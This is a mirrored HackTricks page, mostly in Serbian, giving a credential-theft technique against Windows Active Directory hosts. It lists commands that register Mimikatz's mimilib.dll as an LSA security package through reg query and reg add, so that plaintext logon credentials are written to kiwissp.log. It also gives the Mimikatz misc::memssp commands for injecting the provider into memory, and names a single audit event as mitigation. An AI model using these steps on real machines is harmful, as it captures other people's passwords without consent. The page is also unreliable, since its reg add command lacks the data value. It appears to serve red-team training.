Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-26 06:30:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md

3.6 KiB
Raw Blame History

Custom SSP

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Custom SSP

Learn what is a SSP (Security Support Provider) here.
Možete kreirati svoj SSP da zabeležite u čistom tekstu akreditive korišćene za pristup mašini.

Mimilib

Možete koristiti mimilib.dll binarni fajl koji pruža Mimikatz. Ovo će zabeležiti sve akreditive u čistom tekstu u fajl.
Postavite dll u C:\Windows\System32\
Dobijte listu postojećih LSA sigurnosnih paketa:

{% code title="attacker@target" %}

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

{% endcode %}

Dodajte mimilib.dll na listu provajdera podrške za bezbednost (Bezbednosni paketi):

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

I nakon ponovnog pokretanja, sve akreditive možete pronaći u čistom tekstu u C:\Windows\System32\kiwissp.log

U memoriji

Takođe možete direktno injektirati ovo u memoriju koristeći Mimikatz (imajte na umu da može biti malo nestabilno/ne radi):

privilege::debug
misc::memssp

Ovo neće preživeti ponovna pokretanja.

Ublažavanje

ID događaja 4657 - Revizija kreiranja/promene HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages

{% hint style="success" %} Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Podržite HackTricks
{% endhint %}